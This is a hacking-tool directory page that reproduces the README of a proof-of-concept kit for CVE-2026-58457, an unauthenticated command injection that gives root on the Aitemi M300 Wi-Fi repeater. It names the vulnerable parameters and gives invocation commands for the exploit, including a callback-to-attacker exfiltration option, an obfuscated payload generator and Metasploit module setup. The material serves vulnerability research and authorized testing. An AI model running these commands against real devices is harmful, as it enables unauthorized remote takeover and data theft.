Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-58457 — PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only. | Kitploit
Tools/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Learning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

View Repository
21 month agoNot yet reviewed

CVE-2026-58457 - Unauthenticated OS Command Injection in Shenzhen Aitemi M300 Wi-Fi Repeater

[!WARNING] This code is provided AS IS for educational and research purposes only. Do not use this PoC on production systems, shared environments, or any unauthorized targets.

  • Running or hosting this code may trigger antivirus detections, security monitoring alerts, or legal consequences if misused.
  • The authors and repository maintainers assume no liability for any damage, misuse, or illegal activity resulting from this code.
  • Use exclusively in isolated lab environments with proper authorization. Intended for defensive research, vulnerabilityf analysis, and blue-team testing only.

Vulnerability Summary

An unauthenticated OS command injection vulnerability exists in the smacfilter_conf handler. The name, enable, and mac GET parameters are passed unsanitized into a sprintf() call that constructs UCI commands executed as root.

  • Severity: Critical (CVSS 9.8)
  • Impact: Remote root command execution with no authentication required

Included Tools

  • poc.py - Full-featured exploit with HTTPS support, retries, timeout, and callback exfiltration.
  • val.py - Safe, passive vulnerability validator (uses harmless id command).
  • gen.py - Advanced payload generator with multiple obfuscation techniques.
  • MITIGATIONS.md - Recommended defensive measures.
  • Metasploit Module - Available in the exploit/ directory.

Installation

root@kitploit:~
pip install requests

Quick Usage

  1. Validate (Safe)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. Exploit (Authorized Testing Only)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. Generate Obfuscated Payloads
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. Move the Module
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. Reload All
root@kitploit:~
msfconsole -q -x "reload_all"

References

  • CVE-2026-58457
  • VulnCheck Advisory
  • GitHub Disclosure

Stars and contributions welcome - especially improvements to bypasses or additional firmware variants.

Download Tool